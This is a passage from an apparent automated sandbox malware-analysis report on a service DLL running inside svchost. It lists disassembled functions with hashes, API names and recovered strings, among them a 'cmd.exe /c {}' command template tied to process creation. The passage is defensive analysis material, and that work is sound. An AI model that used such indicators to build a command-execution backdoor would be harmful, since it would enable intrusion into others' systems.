            • Instruction Fuzzy Hash: 1A718F62A1CA8691EB13EB21D4503BA27A0FB56B88F58C131DA8D076A7DF7CE584C744
            Function 00007FFA417F76D0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: other_error
            • API String ID: 1944019136-896093151
            • Opcode ID: 46c2e466bfcbd234a49d75eccae352d2e72506dc183e43a35bea45db466a189e
            • Instruction ID: 682caa9c8c5a2e19245a24e4ef5ab25386ef20253e3990b6b01b3a054f2e084d
            • Opcode Fuzzy Hash: 46c2e466bfcbd234a49d75eccae352d2e72506dc183e43a35bea45db466a189e
            • Instruction Fuzzy Hash: 9851A362F1DB8594EB02EF75D4803AD2361EF56798F50D331EA2C12AE6EF68E190C344
            Function 00007FFA417F9490 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 154COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: out_of_range
            • API String ID: 1944019136-3053435996
            • Opcode ID: 2f6af5d0ec7809bf5e594dbb3042df54aef139d4b5368122e7d9f98310518c8c
            • Instruction ID: 52908dec9f5572886d4ff0564d43992178f16feacbe654ce70f2ac040cc5fef9
            • Opcode Fuzzy Hash: 2f6af5d0ec7809bf5e594dbb3042df54aef139d4b5368122e7d9f98310518c8c
            • Instruction Fuzzy Hash: 1A51B362F1DB8594EB02EF75D4903AD2361EB56398F50D331EA2C13AE6EF68E190C344
            Function 00007FFA417F4480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 150COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: _invalid_parameter_noinfo_noreturn$__std_exception_copy
            • String ID: type_error
            • API String ID: 1944019136-1406221190
            • Opcode ID: 60f9d702eb8e27b0e1236a347d63c92d24e049e302713a039c9c627d3543b1bf
            • Instruction ID: c195d220f83b23da73f95e11d06424a8e6192debdab5a9556ff69ed3e6a85301
            • Opcode Fuzzy Hash: 60f9d702eb8e27b0e1236a347d63c92d24e049e302713a039c9c627d3543b1bf
            • Instruction Fuzzy Hash: 5B51C362F5CB4195EB02EB75D4803AD2331EF563A8F509331EA2D12AE6EF68E195C344
            Function 68281050 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 146sleepCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: Sleep_amsg_exit
            • String ID: *h
            • API String ID: 1015461914-2503545728
            • Opcode ID: d71459b7e88d01f4bf183fdd78d36db14fdc43101005de96b340a8d435ed0a17
            • Instruction ID: bc10db7b8ab239d922cef09c0acd2a62a0b9178dccc3a2cd58c18541aecdeb8b
            • Opcode Fuzzy Hash: d71459b7e88d01f4bf183fdd78d36db14fdc43101005de96b340a8d435ed0a17
            • Instruction Fuzzy Hash: A941BF7271166AC5EF058B1BE96075922A2B744F99F888526CE3C873D4EF79C8D5C300
            Function 00007FFA417EBB50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 137COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: __std_exception_destroy_invalid_parameter_noinfo_noreturn
            • String ID: at line $, column
            • API String ID: 729085983-191570568
            • Opcode ID: 3b625d8fae75a84ccd4ccd8625523e9856e43c18d8bdc2832f3306b6a8bdd0bf
            • Instruction ID: df64c524e5536f1b834ef53c18e85a7a646cbeaf14a7155c9d11b05a0ec062b1
            • Opcode Fuzzy Hash: 3b625d8fae75a84ccd4ccd8625523e9856e43c18d8bdc2832f3306b6a8bdd0bf
            • Instruction Fuzzy Hash: 5551C462A0C74581EB12AB15E18037E6761EB86BD4F508131EA5D07BEBDF7CE491C748
            Function 00007FFA4185F564 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: {for
            • API String ID: 2943138195-864106941
            • Opcode ID: 01ab92cd314f3a3e33d37c51ddd0482448ebee4470facb04c4aea7c8b7d7bd22
            • Instruction ID: 5927ee9e55a9aa716b387d1d019dbbaa3148e401d2efce22cb8beb9feb93a406
            • Opcode Fuzzy Hash: 01ab92cd314f3a3e33d37c51ddd0482448ebee4470facb04c4aea7c8b7d7bd22
            • Instruction Fuzzy Hash: 5F511976A0CA86A9E703AF25D4803E877A0EB4674CF40C432EA4D57BAADF7CE555C710
            Function 00007FFA417EAB30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 126COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00007FFA41850AF0: GetCurrentThreadId.KERNEL32 ref: 00007FFA41850B41
              • Part of subcall function 00007FFA41850AF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,00000000,00007FFA418510D1,?,?,?,00007FFA41835F97), ref: 00007FFA41850B60
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA417EAD03
            • std::_Throw_Cpp_error.LIBCPMT ref: 00007FFA417EAD0E
            • std::_Throw_Cpp_error.LIBCPMT ref: 00007FFA417EAD23
            • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFA417EAD2F
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Cpp_errorThrow__invalid_parameter_noinfo_noreturnstd::_$AcquireCurrentExclusiveLockThread
            • String ID: [+] $[-]
            • API String ID: 3822504202-3676303169
            • Opcode ID: ef7c4d45ab3a0c29d5cc6bb7da52a2a04dca5d681e3515abc86de6a072b2ff23
            • Instruction ID: fe5b9cd83e0081cb4c91ab0452a488c9ae1e08ab457d98248445de971ed4c59b
            • Opcode Fuzzy Hash: ef7c4d45ab3a0c29d5cc6bb7da52a2a04dca5d681e3515abc86de6a072b2ff23
            • Instruction Fuzzy Hash: 1051B472A0C74681EB53BB25E44077A73A1EB827A4F508731E66C426FADF7CE484CB44
            Function 00007FFA417D0970 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 121COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Xinvalid_argumentstd::_
            • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
            • API String ID: 909987262-2189586557
            • Opcode ID: c42ba10caa87dec15c2a1dc717eeddd85dbbd19922bf1dfca907701a47dc17b1
            • Instruction ID: cb3523d8c50db825d7af5d7a6b975f2ee5584722a265f4461ffe6ed4b44b8f3d
            • Opcode Fuzzy Hash: c42ba10caa87dec15c2a1dc717eeddd85dbbd19922bf1dfca907701a47dc17b1
            • Instruction Fuzzy Hash: E441FC12F0C69A86EB23B749E4040BD6371DB92BC4F58D432DA8D177B6DE6CE6418B05
            Function 00007FFA417C3590 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
            • String ID: bad locale name$false
            • API String ID: 2967684691-2236580902
            • Opcode ID: af4ba545310d87b0416df412bc63d27242d58c22569339931ea64804b945de5c
            • Instruction ID: b33a55193d6ef30e0b7b2eda5c298943fb850909550cab5e56c83ab59d61ebea
            • Opcode Fuzzy Hash: af4ba545310d87b0416df412bc63d27242d58c22569339931ea64804b945de5c
            • Instruction Fuzzy Hash: 39417C22B0DB41CAFB23EFB0D4502BD23B4AF45748F548438DE4D26AA6EF38E5169744
            Function 68283B20 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 103COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2337881551.0000000068281000.00000020.00000001.01000000.00000019.sdmp, Offset: 68280000, based on PE: true
            • Associated: 0000002E.00000002.2337800612.0000000068280000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338814328.0000000068296000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2338878664.0000000068297000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339257856.00000000682A0000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339331155.00000000682A1000.00000004.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682A5000.00000002.00000001.01000000.00000019.sdmpDownload File
            • Associated: 0000002E.00000002.2339424514.00000000682EC000.00000002.00000001.01000000.00000019.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_68280000_svchost.jbxd
            Similarity
            • API ID: isalphamalloc$isalnum
            • String ID: iso
            • API String ID: 2831391162-1633189697
            • Opcode ID: 379039d3c6cd4022b394262d792753cea32b5fb76a50e5e8bc0dc4f44bcb7480
            • Instruction ID: 4d61cd036929f077c3b3353bd730b2f175edf52a7f4f44be370ff802bb0db5f3
            • Opcode Fuzzy Hash: 379039d3c6cd4022b394262d792753cea32b5fb76a50e5e8bc0dc4f44bcb7480
            • Instruction Fuzzy Hash: 3C316DE270969986EE05DF26A81836A7B91FB447D4F888425EE6D43390EF39C04EC300
            Function 00007FFA417E4A40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99processsynchronizationCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: CloseHandle$CreateObjectProcessSingleWait_invalid_parameter_noinfo_noreturn
            • String ID: cmd.exe /c {}
            • API String ID: 3882512363-3162138867
            • Opcode ID: e6e73508bac80ffb6bc673906e498a8d019b8ec9f6624faa178bb13faa37020d
            • Instruction ID: 969367d101f4c6b6cc3dc91c3651f1b5bc42ede417df6b99b30cd8f25a709f68
            • Opcode Fuzzy Hash: e6e73508bac80ffb6bc673906e498a8d019b8ec9f6624faa178bb13faa37020d
            • Instruction Fuzzy Hash: CE515332E1CB818AE711DF64E8403AD73B1F799758F109225EA8C56A69EF78E194C700
            Function 00007FFA418598A4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+Replicator::operator[]
            • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
            • API String ID: 1405650943-2211150622
            • Opcode ID: abdf3c9d47fd777483e5986572490f175ff6de82a80ae3827d73ded38ea1d109
            • Instruction ID: af7612be24c3871c85585ea54b76b79118129ca49171879630f2cb2be96cb0b7
            • Opcode Fuzzy Hash: abdf3c9d47fd777483e5986572490f175ff6de82a80ae3827d73ded38ea1d109
            • Instruction Fuzzy Hash: 4C41F26AE0CB4698F713AF28D8802B837B4FB0670CF548532CA4D667A5DF7CA545C711
            Function 00007FFA4185B6B8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: Name::operator+
            • String ID: char $int $long $short $unsigned
            • API String ID: 2943138195-3894466517
            • Opcode ID: 95ccef905f3e3d65094cd85f74d5c660e404a7f864b719e0b38266dc58e888a9
            • Instruction ID: 8799a2e414405ed204b0a4c3e9568368fbd02ff93ae6d6397c5bae7dd9744f39
            • Opcode Fuzzy Hash: 95ccef905f3e3d65094cd85f74d5c660e404a7f864b719e0b38266dc58e888a9
            • Instruction Fuzzy Hash: D4318A36A0CB42CEE707AF68D8901B837B1FB86748F58C131DA0D16BA8CE3CA504C714
            Function 00007FFA4186D374 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 55COMMON
            Download Yara Rule
            APIs
            Strings
            • C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp, xrefs: 00007FFA4186D37B
            • m_data.m_type != value_t::binary || m_data.m_value.binary != nullptr, xrefs: 00007FFA4186D37A
            • Assertion failed: %Ts, file %Ts, line %d, xrefs: 00007FFA4186D3C8
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ConsoleFileHandleTypeWrite
            • String ID: Assertion failed: %Ts, file %Ts, line %d$C:\(universalsvc) Service DLL\universalsvc\packages\include\nlohmann\json.hpp$m_data.m_type != value_t::binary || m_data.m_value.binary != nullptr
            • API String ID: 3929808755-1148463386
            • Opcode ID: 63001ea6ba79e4a50ba612dd459d85162b6cb0f9379f9c64e478c464b0927dc1
            • Instruction ID: 5ce128bdeab8012d087b57731cc8daaa0729ef9381c57744d57512c521d2eda5
            • Opcode Fuzzy Hash: 63001ea6ba79e4a50ba612dd459d85162b6cb0f9379f9c64e478c464b0927dc1
            • Instruction Fuzzy Hash: 8B219662A1D68581E722AB11E8443BA7364FB867B4F904331EBAD43AE4DF3CE445C700
            Function 00007FFA418868EC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
            • String ID: CONOUT$
            • API String ID: 3230265001-3130406586
            • Opcode ID: d9e83cc94cd33d4cdfdda30e5a1156599a90fed5ffdb57acf0032824c01eff7e
            • Instruction ID: 6f2edfabcda29e4308abd6c321d90896dbab8f7a7e47bd158c9cf05d8d31c1bb
            • Opcode Fuzzy Hash: d9e83cc94cd33d4cdfdda30e5a1156599a90fed5ffdb57acf0032824c01eff7e
            • Instruction Fuzzy Hash: B4118121B2CA4186E752EB56E84432963A0FB89BF4F148334EA5D87BB4DF7DF8048740
            Function 00007FFA418514A0 Relevance: 9.2, APIs: 6, Instructions: 239COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ByteCharMultiWide$CompareInfoString
            • String ID:
            • API String ID: 2984826149-0
            • Opcode ID: 7b28e9be4e088b1b437ccc7f1407690865e8d00d62fb0889575e4134cf6ef8df
            • Instruction ID: b83980ccf0d70553e8fda9c889dc06ad5922eef89f9709b0b311fcc17193cc55
            • Opcode Fuzzy Hash: 7b28e9be4e088b1b437ccc7f1407690865e8d00d62fb0889575e4134cf6ef8df
            • Instruction Fuzzy Hash: 9AA1A262B0C68246EB23AF2594503B966D1EF42BACF58C631DA6D077E9DF3CF5458300
            Function 00007FFA418511A4 Relevance: 9.2, APIs: 6, Instructions: 206COMMON
            Download Yara Rule
            APIs
            Memory Dump Source
            • Source File: 0000002E.00000002.2390355166.00007FFA417C1000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFA417C0000, based on PE: true
            • Associated: 0000002E.00000002.2390316725.00007FFA417C0000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398023144.00007FFA4194C000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398106510.00007FFA4194F000.00000008.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398151171.00007FFA41950000.00000004.00000001.01000000.00000015.sdmpDownload File
            • Associated: 0000002E.00000002.2398263480.00007FFA41954000.00000002.00000001.01000000.00000015.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_46_2_7ffa417c0000_svchost.jbxd
            Similarity
            • API ID: ByteCharMultiStringWide
            • String ID:
            • API String ID: 2829165498-0
            • Opcode ID: 19a4a203021038a76d238e10d8a64ef2caccf65106a5bd2ad264a91c8f35951f
            • Instruction ID: 532a3225672e693c1175f3cc5dab5c437035941799566cf208c23c9d9994c7e3
            • Opcode Fuzzy Hash: 19a4a203021038a76d238e10d8a64ef2caccf65106a5bd2ad264a91c8f35951f
